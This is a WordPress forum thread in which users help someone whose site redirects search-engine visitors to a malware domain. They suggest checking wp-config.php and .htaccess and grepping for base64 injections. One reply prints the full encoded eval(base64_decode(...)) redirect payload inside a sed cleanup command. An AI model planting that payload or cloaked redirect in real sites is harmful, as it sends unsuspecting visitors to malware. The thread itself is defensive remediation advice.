WordPress.org

Ready to get started?Download WordPress

Forums

Hacked... but only through Google? (5 posts)

  1. benjancewicz
    Member
    Posted 2 years ago #

    So, it looks like a site we built got hacked.
    You can still get to it easy enough by going directly.

    BUT, if you search for MTCSLaw on Google, it brings you to this malware page:

    http://costabrava.bee.pl/

    So...
    How do I figure out where the problem is?
    How do I prevent it from happening again?
    How do I remove it?

    Thanks!

  2. esmi
    Forum Moderator
    Posted 2 years ago #

  3. Ken
    Member
    Posted 2 years ago #

    I had this same issue fortunately it was very easy to track down on my site. Check your wp-config.php file and look for a line that starts with "eval(base64_decode" - delete this code all the way to the semicolon at the end of the line. Assuming the hacker didn't do additional damage, this should fix your issue.

    To prevent further issues I would make sure that you upgrade WordPress and all plugins and be sure to change all usernames and passwords.

    If you need any additional help, feel free to contact me.

  4. dittodot
    Member
    Posted 2 years ago #

    This hack could be caused by two things, Ken is correct that a base64 injection is one of them. A hack like this would cause the problem you are seeing, it may be in one or more files however.

    The other option which I think it would be is
    via a .htaccess modification, sending users coming from search engines to malicious domains.
    To fix this, you can simply look in the .htaccess file and remove the code. It seems more likely this is your culprit after scanning over your site.
    --
    Best Regards,
    David G.
    http://www.dittodot.com

  5. dakruhm
    Member
    Posted 2 years ago #

    It's probably on more than one file, it's probably on all php files in the directory. With shell access:

    cd /path/to/wordpress/install/
    grep -r base64 ./*

    If you see something like the following, then it's redirecting:
    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbm..."));

    This above is the shortened encoded code. The output of the code is actually:

    [Code moderated>]

    The site will respond normally if you hit it directly. If it comes from one of the referers (google, yahoo, myspace, facebook, etc) it'll be redirected to the costabrava-dot-bee-dot-pl web site.

    Getting rid of the code:
    sed -i 's/eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw\/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));//g' ./*.php

    Be very careful with the above. Don't adjust it if you are lost/uncertain. In which case, it may be easier to restore from backup.

    Afterwords, spend some time hardening the site with the links above. Especially checking extensions.

    HTH

    Thanks,

Topic Closed

This topic has been closed to new replies.

About this Topic